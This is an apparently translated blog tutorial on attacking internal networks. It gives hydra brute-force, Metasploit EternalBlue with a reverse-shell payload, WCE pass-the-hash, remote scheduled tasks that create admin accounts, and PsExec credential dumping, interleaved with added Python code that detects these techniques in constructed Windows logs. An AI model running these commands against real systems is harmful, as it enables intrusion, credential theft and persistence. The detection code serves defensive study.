Intranet penetration: common approaches and ideas (port scanning, weak password scanning, exploiting MS17-010, hash injection, remote connection and program execution ......)

Port Scan

Common ports and the attacks associated with them

For the scanning methods themselves, see my other article, which describes the use of port scanning tools in detail.

Weak password scanning

Weak password scanning means trying to log in to services such as MySQL, VNC, RDP and HTTP management interfaces with weak passwords. You can use weak-password scanning tools such as xscan, hydra, medusa and nmap, or look for more and better tools yourself.

hydra

1. First scan with nmap to find out which ports are open

2. Use hydra to scan the open ports for weak passwords

hydra -L user.txt -P pass.txt 192.168.16.137 smb

(192.168.16.137 is the IP to brute-force, smb is the name of the service to brute-force)

-l: specify a single user name; -L: specify a user name dictionary; -p: specify a single password; -P: specify a password dictionary

nmap script

The scripts live in the script directory under the nmap installation directory.

Brute-force scripts belong to the brute category; vulnerability detection scripts belong to the vuln category.

Usage

nmap -p <port the script targets> --script <script name> <target ip>
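From the defender's side, the visible trace of this step is the volume of failed logons it produces on the target. The following Python is an added example, not code from the original post: it runs a sliding-window count over constructed, reduced Windows Security 4625 (failed logon) records and separates a single-account brute force (one user, many passwords) from a password spray (many users) by the number of distinct accounts involved. The field names, the sample events and the thresholds are assumptions made for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: reduced Windows Security 4625 (failed logon) and 4624
# (successful logon) records. Made up for this example, not real logs.
SAMPLE_EVENTS = [
    # six failures against one account from one source within 30 seconds
    {"time": "2020-03-25T12:40:00", "event_id": 4625, "src_ip": "10.0.0.5", "user": "administrator"},
    {"time": "2020-03-25T12:40:05", "event_id": 4625, "src_ip": "10.0.0.5", "user": "administrator"},
    {"time": "2020-03-25T12:40:10", "event_id": 4625, "src_ip": "10.0.0.5", "user": "administrator"},
    {"time": "2020-03-25T12:40:15", "event_id": 4625, "src_ip": "10.0.0.5", "user": "administrator"},
    {"time": "2020-03-25T12:40:20", "event_id": 4625, "src_ip": "10.0.0.5", "user": "administrator"},
    {"time": "2020-03-25T12:40:30", "event_id": 4625, "src_ip": "10.0.0.5", "user": "administrator"},
    # five failures against five different accounts from another source (spray pattern)
    {"time": "2020-03-25T12:41:00", "event_id": 4625, "src_ip": "10.0.0.7", "user": "alice"},
    {"time": "2020-03-25T12:41:02", "event_id": 4625, "src_ip": "10.0.0.7", "user": "bob"},
    {"time": "2020-03-25T12:41:04", "event_id": 4625, "src_ip": "10.0.0.7", "user": "carol"},
    {"time": "2020-03-25T12:41:06", "event_id": 4625, "src_ip": "10.0.0.7", "user": "dave"},
    {"time": "2020-03-25T12:41:08", "event_id": 4625, "src_ip": "10.0.0.7", "user": "erin"},
    # a user mistyping a password twice, an hour apart, then succeeding: benign
    {"time": "2020-03-25T09:00:00", "event_id": 4625, "src_ip": "10.0.0.9", "user": "frank"},
    {"time": "2020-03-25T10:00:00", "event_id": 4625, "src_ip": "10.0.0.9", "user": "frank"},
    {"time": "2020-03-25T10:00:20", "event_id": 4624, "src_ip": "10.0.0.9", "user": "frank"},
]


def parse_time(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S")


def detect_logon_guessing(events, threshold=5, window_seconds=60):
    """Flag any source IP with >= threshold failed logons inside a sliding window.

    Returns one alert per offending source, labelled as a single-account
    brute force (one user, many passwords) or a password spray (many users).
    """
    failures = defaultdict(list)
    for event in events:
        if event["event_id"] == 4625:
            failures[event["src_ip"]].append(event)

    alerts = []
    for src_ip, evs in failures.items():
        evs.sort(key=lambda e: parse_time(e["time"]))
        times = [parse_time(e["time"]) for e in evs]
        start = 0
        for end in range(len(evs)):
            # shrink the window from the left until it spans <= window_seconds
            while times[end] - times[start] > timedelta(seconds=window_seconds):
                start += 1
            count = end - start + 1
            if count >= threshold:
                users = sorted({e["user"] for e in evs[start:end + 1]})
                kind = "password spray" if len(users) > 1 else "single-account brute force"
                alerts.append({"src_ip": src_ip, "count": count, "users": users, "kind": kind,
                               "first": evs[start]["time"], "last": evs[end]["time"]})
                break  # one alert per source is enough
    return sorted(alerts, key=lambda a: a["src_ip"])


if __name__ == "__main__":
    for alert in detect_logon_guessing(SAMPLE_EVENTS):
        print(alert)
```

The alert fires the moment the threshold is reached inside the window, so the count it reports is the threshold rather than the eventual total; the source IP and the user list are what an analyst needs to lock the account or block the host.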

msfconsole

1. Start msfconsole

2. Search for the modules available for the vulnerability

search 17_010

3. Browse the vulnerability scanning modules (they live under this prefix)

use auxiliary/scanner/

4. Use the scanner module to find vulnerable machines in the specified network segment

use auxiliary/scanner/smb/smb_ms17_010
set threads 10
set rhosts <network segment to scan>/24
exploit

5. Select a vulnerable machine and attack it with the exploit module

use exploit/windows/smb/ms17_010_eternalblue
set lhost <local ip>
set rhosts <target ip>/32
set payload windows/x64/meterpreter/reverse_tcp
exploit

Hash injection

Principle

Hash injection works by injecting the NTLM hash of a local or domain user that we have already obtained into the local authentication process (lsass.exe), so that the system behaves as if that user had logged on locally; an IPC logon to the target machine then grants the target's privileges. How to obtain the hash of a local or domain user on the target is left to your imagination; hash injection itself exists to deal with NTLM hashes that cannot be cracked.

Method

1. First use wce to obtain hash values on a machine inside the network; a hash that is too complex cannot be cracked

wce -l

2. In practice, many machines in a network often use the same password (the same password produces the same hash)

3. Try logging on to other machines with the obtained hash; if the account password is the same, the logon succeeds

1. Get the target's host name or domain name

ping -a <target ip>

2. Log on with the hash obtained earlier; if an NTLM hash is not available, 0 can be used in its place

wce.exe -s Administrator:WIN-P68FLB30G1I:B73A13E9B7832A35AAD3B435B51404EE:AFFFEBA176210FAD4628F0524BFE1942

3. Access the target machine's default C$ share remotely

dir \\<target ip>\c$

4. Map the target's C drive to the local machine

net use z: \\<target ip>\c$
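The logon that credential injection creates on the injecting machine is itself recorded in that machine's Security log. The following Python is an added example, not code from the original post: it looks for a Security 4624 logon of type 9 (NewCredentials) with logon process seclogo and authentication package Negotiate, the pattern documented for Mimikatz-style hash injection and assumed here to cover WCE as well, and then correlates it with NTLM network logons (type 3) that other hosts receive from the injecting machine's IP shortly afterwards. runas /netonly produces the same local event, which is why the correlation, not the single event, raises the severity. Field names and the sample events are constructed for the example.

```python
from datetime import datetime

# Constructed sample: reduced Windows Security 4624 (successful logon) records
# collected from two hosts. Made up for this example, not real logs.
SAMPLE_EVENTS = [
    # WS01: console logon by a normal user, logon type 2 (interactive)
    {"time": "2020-03-25T12:49:00", "host": "WS01", "host_ip": "192.168.16.100", "event_id": 4624,
     "logon_type": 2, "logon_process": "User32", "auth_package": "Negotiate", "user": "alice", "src_ip": "127.0.0.1"},
    # WS01: a credential-injection tool creates a NewCredentials logon (type 9)
    {"time": "2020-03-25T12:50:00", "host": "WS01", "host_ip": "192.168.16.100", "event_id": 4624,
     "logon_type": 9, "logon_process": "seclogo", "auth_package": "Negotiate", "user": "alice", "src_ip": "::1"},
    # SRV02: ninety seconds later, a network logon (type 3) over NTLM arriving from WS01
    {"time": "2020-03-25T12:51:30", "host": "SRV02", "host_ip": "192.168.16.158", "event_id": 4624,
     "logon_type": 3, "logon_process": "NtLmSsp", "auth_package": "NTLM", "user": "Administrator", "src_ip": "192.168.16.100"},
    # SRV02: an unrelated Kerberos network logon from a domain-joined workstation
    {"time": "2020-03-25T12:52:00", "host": "SRV02", "host_ip": "192.168.16.158", "event_id": 4624,
     "logon_type": 3, "logon_process": "Kerberos", "auth_package": "Kerberos", "user": "bob", "src_ip": "192.168.16.120"},
]


def parse_time(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S")


def is_credential_injection(event):
    """Type 9 (NewCredentials) logon through the seclogo logon process with Negotiate.

    runas /netonly generates the same event, so on its own this is only a
    medium-confidence indicator; the follow-up NTLM logons decide.
    """
    return (event["event_id"] == 4624 and event["logon_type"] == 9
            and event["logon_process"].lower() == "seclogo"
            and event["auth_package"].lower() == "negotiate")


def detect_pass_the_hash(events, max_gap_seconds=600):
    """Correlate an injection on one host with NTLM network logons it then sends out.

    The injected account is not named in the type 9 event, so the join key is
    the injecting host's IP appearing as the source of later type 3 NTLM logons.
    """
    alerts = []
    for injection in filter(is_credential_injection, events):
        t0 = parse_time(injection["time"])
        followups = [
            e for e in events
            if e["event_id"] == 4624 and e["logon_type"] == 3
            and e["auth_package"].upper() == "NTLM"
            and e["src_ip"] == injection["host_ip"]
            and e["host"] != injection["host"]
            and 0 <= (parse_time(e["time"]) - t0).total_seconds() <= max_gap_seconds
        ]
        alerts.append({
            "source_host": injection["host"],
            "injection_time": injection["time"],
            "targets": [(e["host"], e["user"], e["time"]) for e in followups],
            "severity": "high" if followups else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_pass_the_hash(SAMPLE_EVENTS):
        print(alert)
```

Running this across logs from both hosts is the point: the injecting workstation alone only shows a medium-severity type 9 logon, and the file server alone only shows an ordinary NTLM network logon; joined on the source IP within the time window they become one high-severity alert.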

Remote connection & program execution

Adding a scheduled task

at scheduled tasks

Note

Use case: you have the target machine's account password but cannot connect via Remote Desktop.
The Task Scheduler service must be running on the target.

1. Connect to the target machine through the default IPC$ share

net use \\<target ip> /user:administrator <password>

2. Check the target's local time

net time \\<target ip>

3. Add an at scheduled task

3.1 Run a command directly

at \\<target ip> <time> <command>

Example:
Create a user

at \\192.168.16.158 12:50 net user zs 123.com /add

Add the user to the Administrators group

at \\192.168.16.158 12:50 net localgroup administrators zs /add

3.2 Use a script

Create a .bat file whose content creates a new user and adds it to the Administrators group

Copy the .bat file to the target machine

copy 1.bat \\<target ip>\c$\1.bat

Add a scheduled task that runs the script

at \\<target ip> <time> <script path>

4. List all at tasks on the target machine

at \\192.168.16.158

Adding a schtasks scheduled task

Note
Use case: you have the target machine's account password but cannot connect via Remote Desktop.
On systems newer than 2003 the Task Scheduler service must be enabled before this can be used.

1. Create a .bat file whose content creates a new user and adds it to the Administrators group

2. Connect to the target machine through the default IPC$ share

net use \\<target ip> /user:administrator <password>

3. Copy the .bat file to the target machine

copy 1.bat \\<target ip>\c$\1.bat

4. Check the target's local time

net time \\<target ip>

5. Add the scheduled task with the following schtasks command

schtasks /create /tn aa /tr <script path> /sc once /st <time> /S <target ip> /U <user name> /P <password> /RU system

Adding /RU system runs the task as the SYSTEM user; it can also be omitted. The script path can be replaced with a single command.

6. Run the scheduled task immediately instead of waiting for its scheduled time

schtasks /run /tn <task name> /s <target ip> /u <user name> /p <password>

7. Delete the scheduled task

schtasks /delete /tn <task name> /s <target ip> /u <user name> /p <password> /F

psexec remote execution

1. Upload the software from the local machine to the target

net use \\<target ip>\c$ /user:administrator <password>
copy wce.exe \\<target ip>\c$\

2. Run the program on the target

PsExec.exe \\<target ip> -accepteula -u <user> -p <password> <program to run>

On the first run a license dialog pops up; passing the -accepteula parameter suppresses it.

3. Use psexec's own parameter to upload a local program to the target machine; it is deleted automatically after execution

Psexec.exe \\<target ip> -u <user> -p <password> -c QuarksPwDump.exe -d

-c <[path]filename>: copy the file to the remote machine and run it (note: the file is deleted automatically after it finishes running)
-d: do not wait for the program to finish and return
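Both the at/schtasks technique and PsExec leave host-side records on the target that do not depend on knowing which command was run. The following Python is an added example that is not part of the original post and serves both sections: it inspects constructed, reduced Security 4698 (scheduled task created; logged when the "Other Object Access Events" audit subcategory is enabled) records, parsing the TaskContent XML for the principal and the action, and System 7045 (service installed) records for the PSEXESVC service that PsExec installs by default. The names At1, At2, ... are what at.exe assigns to its tasks. Field names, the XML builder and the sample events are assumptions made for the example, and the service name check is one indicator among several rather than a complete PsExec detection.

```python
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# actions that create or elevate accounts, or run a dropped batch file
SUSPICIOUS_COMMAND = re.compile(r"\bnet1?\s+(user|localgroup)\b|\.bat\b", re.IGNORECASE)
SYSTEM_SID = "S-1-5-18"


def task_xml(command, arguments, user_id):
    """Build the TaskContent XML a 4698 event carries (constructed helper for the sample)."""
    return (
        f'<Task version="1.2" xmlns="{TASK_NS["t"]}">'
        f"<Principals><Principal id=\"Author\"><UserId>{user_id}</UserId></Principal></Principals>"
        f"<Actions Context=\"Author\"><Exec><Command>{command}</Command>"
        f"<Arguments>{arguments}</Arguments></Exec></Actions></Task>"
    )


# Constructed sample: reduced Security 4698 (task created) and System 7045
# (service installed) records, made up for this example.
SAMPLE_EVENTS = [
    # legacy at.exe task: auto-named At1, runs as SYSTEM, creates a user
    {"event_id": 4698, "host": "SRV02", "subject": "administrator", "task_name": "\\At1",
     "task_content": task_xml("net", "user zs 123.com /add", SYSTEM_SID)},
    # schtasks /create ... /RU system pointing at a dropped batch file
    {"event_id": 4698, "host": "SRV02", "subject": "administrator", "task_name": "\\aa",
     "task_content": task_xml("C:\\1.bat", "", SYSTEM_SID)},
    # built-in maintenance task: SYSTEM, but under the \Microsoft\ folder
    {"event_id": 4698, "host": "SRV02", "subject": "SYSTEM",
     "task_name": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "task_content": task_xml("%windir%\\system32\\defrag.exe", "-c -h -o", SYSTEM_SID)},
    # PsExec copies and installs its service on the target
    {"event_id": 7045, "host": "SRV02", "service_name": "PSEXESVC",
     "image_path": "%SystemRoot%\\PSEXESVC.exe", "account": "LocalSystem"},
    # ordinary service installation
    {"event_id": 7045, "host": "SRV02", "service_name": "WinDefend",
     "image_path": "C:\\Program Files\\Windows Defender\\MsMpEng.exe", "account": "LocalSystem"},
]


def task_reasons(event):
    """Return the reasons a 4698 task-creation event looks like remote execution."""
    root = ET.fromstring(event["task_content"])
    user_id = root.findtext("t:Principals/t:Principal/t:UserId", default="", namespaces=TASK_NS)
    command = root.findtext("t:Actions/t:Exec/t:Command", default="", namespaces=TASK_NS)
    arguments = root.findtext("t:Actions/t:Exec/t:Arguments", default="", namespaces=TASK_NS)
    command_line = f"{command} {arguments}".strip()
    reasons = []
    if re.fullmatch(r"\\At\d+", event["task_name"]):
        reasons.append("legacy at.exe task name")
    if SUSPICIOUS_COMMAND.search(command_line):
        reasons.append(f"suspicious action: {command_line}")
    if user_id == SYSTEM_SID and not event["task_name"].startswith("\\Microsoft\\"):
        reasons.append("runs as SYSTEM outside the \\Microsoft\\ task folder")
    return reasons


def service_reasons(event):
    """Return the reasons a 7045 service-installed event looks like PsExec."""
    name = event["service_name"].upper()
    image = event["image_path"].upper()
    if name == "PSEXESVC" or image.endswith("PSEXESVC.EXE"):
        return ["PsExec service installed"]
    return []


def detect_remote_execution(events):
    alerts = []
    for event in events:
        if event["event_id"] == 4698:
            reasons, label = task_reasons(event), event["task_name"]
        elif event["event_id"] == 7045:
            reasons, label = service_reasons(event), event["service_name"]
        else:
            continue
        if reasons:
            alerts.append({"host": event["host"], "event_id": event["event_id"],
                           "object": label, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_remote_execution(SAMPLE_EVENTS):
        print(alert)
```

The task check deliberately reads the action out of the XML rather than the task name, because the name is attacker-chosen (aa in the schtasks example) while the action and the principal are what the task actually does; the at.exe naming pattern and the PSEXESVC name are cheap extra signals, not the core of the detection.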


Origin blog.csdn.net/wsnbbz/article/details/105102705